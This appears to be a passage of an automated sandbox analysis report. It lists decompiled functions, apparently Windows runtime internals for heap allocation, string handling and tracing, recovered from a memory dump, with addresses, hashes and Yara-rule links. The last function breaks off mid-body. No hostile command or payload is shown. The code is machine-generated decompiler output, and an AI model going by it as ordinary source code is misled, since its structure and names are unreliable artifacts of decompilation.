Function 03883D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03883D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03857B60(0, _t61, 0x38211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03857B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03864620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x03883d4c
0x03883d50
0x03883d55
0x03883d5e
0x038be79a
0x00000000
0x038be79a
0x03883d68
0x038be789
0x03883d9d
0x03883da3
0x03883daf
0x03883db5
0x03883dbc
0x03883dc4
0x03883dc9
0x03883dce
0x038be7ae
0x038be7ae
0x03883dde
0x03883de2
0x03883de7
0x03883e0d
0x03883e13
0x03883e16
0x03883e1e
0x03883e25
0x03883e28
0x00000000
0x00000000
0x03883e2a
0x03883e2f
0x03883e37
0x03883e37
0x00000000
0x03883e37
0x03883e31
0x00000000
0x03883e31
0x03883e20
0x03883e20
0x03883e35
0x00000000
0x03883de9
0x03883de9
0x03883de9
0x03883dee
0x03883dfd
0x03883dff
0x03883e02
0x03883e05
0x03883e05
0x00000000
0x03883df0
0x03883de7
0x038be78f
0x038be794
0x03883d79
0x03883d84
0x03883d89
0x03883d8e
0x00000000
0x038be7a4
0x03883d96
0x03883d9a
0x00000000
0x03883d9a
0x00000000
0x038be794
0x03883d6e
0x03883d73
0x00000000
0x038be7b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70e2116122a56456f855a4c0b8fcb3d3ca1dc6ea14b0699379b499e10b7f8b2
Instruction ID: 4e3691756f2e1c80fa6c09cdaa78ce8de3887b9e68fc25894b796574b7e10e9b
Opcode Fuzzy Hash: e70e2116122a56456f855a4c0b8fcb3d3ca1dc6ea14b0699379b499e10b7f8b2
Instruction Fuzzy Hash: 7F31AF3D601619DFCB25DFA9D441A6ABBF5EF45B0470980EAE845CB750E7B0D840C791

Uniqueness

Uniqueness Score: -1.00%

Function 0386C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0386C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03867D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03918D34(_v8, _t80);
					}
					E03862280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0385FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03918833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0385FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0388B180();
						if(_a4 != 0) {
							E03862280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0386BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0386BB2D(_t16, _t15);
						E0386B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0385FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0385FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0385FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0386c18d
0x0386c18f
0x0386c191
0x0386c19b
0x0386c1a0
0x0386c1d4
0x0386c1de
0x038b2d6e
0x0386c1e4
0x0386c1e4
0x0386c1e4
0x0386c1ec
0x038b2d7d
0x038b2d7d
0x0386c1f3
0x0386c1ff
0x038b2d88
0x038b2d8d
0x038b2d94
0x038b2d94
0x038b2d9f
0x038b2da4
0x038b2dab
0x038b2db0
0x038b2db2
0x038b2db3
0x038b2db4
0x038b2dbc
0x038b2dc3
0x038b2dc3
0x0386c205
0x0386c205
0x0386c208
0x0386c20e
0x0386c211
0x0386c216
0x0386c219
0x0386c21f
0x0386c222
0x0386c22c
0x0386c234
0x0386c23a
0x0386c23f
0x0386c245
0x0386c24b
0x0386c251
0x0386c25a
0x0386c276
0x0386c27d
0x0386c27d
0x0386c25c
0x0386c25c
0x00000000
0x0386c25e
0x0386c1a4
0x0386c1aa
0x0386c1b3
0x0386c265
0x0386c26c
0x0386c26c
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: fc7ef02ccd125d8f05d782706e63ebe24d3a560412123224aee615663165dffc
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: B231087560164AAFD705EBF8C480BE9F764BF42204F0841DAD958DB301DB385959D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 038C7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E038C7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x393d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E038C6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E038C6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03867D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03889AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0388B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03864620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x038c7016
0x038c701e
0x038c702b
0x038c7033
0x038c7037
0x038c703c
0x038c703e
0x038c7041
0x038c7045
0x038c704a
0x038c7050
0x038c7055
0x038c705a
0x038c7062
0x038c7062
0x038c705a
0x038c7064
0x038c7064
0x038c7067
0x038c7071
0x038c7096
0x038c709b
0x038c70a2
0x038c70a6
0x038c70a7
0x038c70ad
0x038c70b3
0x038c70b6
0x038c70bb
0x038c70c3
0x038c70c3
0x038c70c6
0x038c70cd
0x038c70dd
0x038c70e0
0x038c70e2
0x038c70e2
0x038c70ee
0x038c7101
0x038c70f0
0x038c70f9
0x038c70f9
0x038c710a
0x038c710e
0x038c7112
0x038c7117
0x038c7118
0x038c7118
0x038c70bb
0x038c711d
0x038c7123
0x038c7131
0x038c7131
0x038c7136
0x038c713d
0x038c713e
0x038c713f
0x038c714a
0x038c714a
0x038c7084
0x038c7088
0x00000000
0x038c708e
0x038c708e
0x038c7092
0x00000000
0x038c7092

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac37c41363880e082b9ae94786c5ba66c761cebe0a66e82a3d648b3682d5aeb7
Instruction ID: ae1500ea8a515162b1de7dfa6c9ba368f72d15a38797372dcb12db3fa412cdd4
Opcode Fuzzy Hash: ac37c41363880e082b9ae94786c5ba66c761cebe0a66e82a3d648b3682d5aeb7
Instruction Fuzzy Hash: 4631A8766147919FC311DFA8C941A6AB7E5BFC8700F084A6DF895CB690E730E904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0387A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0387A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3937b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3937b10 = 8;
					 *0x3937b14 = 0x3937b0c;
					 *0x3937b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0387A990(0x3937b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0387A840(__edx, __ecx, __ecx, _t52, 0x3937b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3937b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x3937b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x3937b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L03864620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3937b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0388F3E0(_t50,  *0x3937b14, _t8 >> 3);
						_t28 =  *0x3937b14; // 0x771c7b0c
						__eflags = _t28 - 0x3937b0c;
						if(_t28 != 0x3937b0c) {
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x3937b14 = _t50;
						_t48 = _v12;
						 *0x3937b10 = _t9;
						goto L6;
					}
					 *0x3937b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0387a713
0x0387a714
0x0387a717
0x0387a71d
0x0387a720
0x0387a722
0x0387a727
0x0387a74a
0x0387a754
0x0387a75e
0x0387a768
0x0387a76a
0x0387a773
0x0387a78b
0x0387a790
0x0387a792
0x0387a741
0x0387a741
0x0387a743
0x0387a749
0x0387a749
0x0387a732
0x0387a73a
0x0387a797
0x0387a79d
0x0387a7a3
0x0387a7a9
0x0387a7b6
0x0387a7bc
0x0387a7ca
0x0387a7e0
0x0387a7e2
0x0387a7e4
0x038b9bf2
0x00000000
0x038b9bf2
0x0387a7ed
0x0387a7f2
0x0387a800
0x0387a805
0x0387a80d
0x0387a812
0x038b9c08
0x038b9c08
0x0387a818
0x0387a81b
0x0387a821
0x0387a824
0x00000000
0x0387a824
0x0387a7ae
0x00000000
0x0387a7ae
0x0387a73c
0x0387a73e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70cc1defb447402ed633d6908d1ad43b7b636d609df685b0b50f7cabda01a672
Instruction ID: 53d2679570d8a231c886fdfa6602d6d367f0c7bbd2266a56814299237632af2f
Opcode Fuzzy Hash: 70cc1defb447402ed633d6908d1ad43b7b636d609df685b0b50f7cabda01a672
Instruction Fuzzy Hash: 6A31CCF160820AAFC715EBC8D880F69B7FAEB85750F14099AE055CB344D378A901CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0384AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0384AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x393d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3937b9c; // 0x0
					_t53 = L03864620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0388B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0388F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03856C59(_t53, _t51, _t58) != 0) {
							_t28 = E03875E50(0x382c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0387B230(_v32, _v28, 0x382c2d8, 1,  &_v24);
								_t28 = E0384F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0384aa25
0x0384aa29
0x0384aa2d
0x0384aa30
0x0384aa37
0x0384aa3c
0x038a4458
0x038a4458
0x038a4472
0x038a4474
0x038a4476
0x0384aa64
0x0384aa74
0x038a447c
0x038a4483
0x038a4492
0x0384aa52
0x0384aa54
0x0384aa5e
0x038a44a8
0x038a44ad
0x038a44af
0x038a44b6
0x038a44b6
0x038a44b9
0x038a44bc
0x038a44cd
0x038a44d3
0x038a44d6
0x038a44e1
0x038a44e1
0x038a44e6
0x038a44e8
0x038a44fb
0x038a44fb
0x038a44e8
0x00000000
0x0384aa5e
0x038a4476
0x0384aa42
0x0384aa46
0x0384aa48
0x0384aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f6bb5a4f70577b8571fad767534190527a1d45c111a5bec48976169f6db42c
Instruction ID: b7f5e051b439fb8b264e1381161f1607aae883ee94d6de3692b3b0480bf8ac7c
Opcode Fuzzy Hash: 60f6bb5a4f70577b8571fad767534190527a1d45c111a5bec48976169f6db42c
Instruction Fuzzy Hash: CD31D171A01619ABDF14EFA8C981A7EB7B9EF04600B0400A9F801EB240E7789A10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 038761A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E038761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03875E50(0x38267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03919D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0384F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x038761b3
0x038761b5
0x038761bd
0x038761c3
0x038761c7
0x038761d2
0x038761ff
0x038761ff
0x03876201
0x03876207
0x03876207
0x038761d4
0x038761d9
0x00000000
0x00000000
0x038761df
0x038761e2
0x00000000
0x00000000
0x038761e6
0x038761e8
0x038761ee
0x038761ee
0x038761f9
0x038b762f
0x038b7632
0x038b7635
0x038b7639
0x038b7640
0x038b766e
0x038b7675
0x00000000
0x00000000
0x038b7681
0x038b7689
0x038b768d
0x038b7691
0x038b7695
0x038b7699
0x038b76af
0x038b76b5
0x038b76b7
0x038b76b7
0x038b76d7
0x038b76dc
0x00000000
0x038b76dc
0x038b76a2
0x038b76a9
0x038b7651
0x038b7653
0x038b7653
0x038b7656
0x038b7656
0x00000000
0x038b7656
0x038b7644
0x038b7646
0x038b7648
0x038b7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc57c6fbab1dd6c950290e382aaa629860c3bf3e23197a1a9e36a397e2f26afb
Instruction ID: 73e1df9385799eb2944e8cdcb4073f88076ad64abb5c05c23d479b95ffd2c069
Opcode Fuzzy Hash: bc57c6fbab1dd6c950290e382aaa629860c3bf3e23197a1a9e36a397e2f26afb
Instruction Fuzzy Hash: C93159716157028FD360CF99C904B6AF7E5AF88B00F0949ADB995DB351E7B0E804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03888EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03888EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x393d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03874E70(0x39386e4, 0x3889490, 0, 0);
					if( *0x39353e8 > 5 && E03888F33(0x39353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x39353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x39353e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x382bc46;
						_t48 = E038C7B9C(0x39353e8, 0x382bc46, _t67, 0x39353e8, _t70,  &_v140);
					}
				}
				return E0388B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x03888ec7
0x03888ed9
0x03888edc
0x03888ee6
0x03888ee9
0x03888eee
0x03888efc
0x03888f08
0x038c1349
0x038c1353
0x038c135d
0x038c1366
0x038c136f
0x038c1375
0x038c137c
0x038c1385
0x038c1390
0x038c1391
0x038c139c
0x038c139d
0x038c13a6
0x038c13ac
0x038c13b2
0x038c13b5
0x038c13bc
0x038c13bf
0x038c13c2
0x038c13c5
0x038c13c8
0x038c13cb
0x038c13ce
0x038c13d1
0x038c13d4
0x038c13d7
0x038c13da
0x038c13dd
0x038c13e0
0x038c13e3
0x038c13e6
0x038c13e9
0x038c13f6
0x038c1400
0x038c1400
0x03888f08
0x03888f32

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c9f24be545c857b0d2dbadf634dd55fed352bd96d757ceb89c88564fca8e0f
Instruction ID: 84dab2412b35b67ef124ac685bba7f248e91b615ad129737d1df4139d4cd9f45
Opcode Fuzzy Hash: e4c9f24be545c857b0d2dbadf634dd55fed352bd96d757ceb89c88564fca8e0f
Instruction Fuzzy Hash: 95418CB1D003189ADB20DFAAD980AADFBF4BB48310F5081AEA519E6200E7749A84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 03884A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03884A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x393d360 ^ _t62;
				_v8 =  *0x393d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03862280(_t26, 0x3938608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0385FFB0(_t41, _t51, 0x3938608);
						L2:
						 *0x393b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0388B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
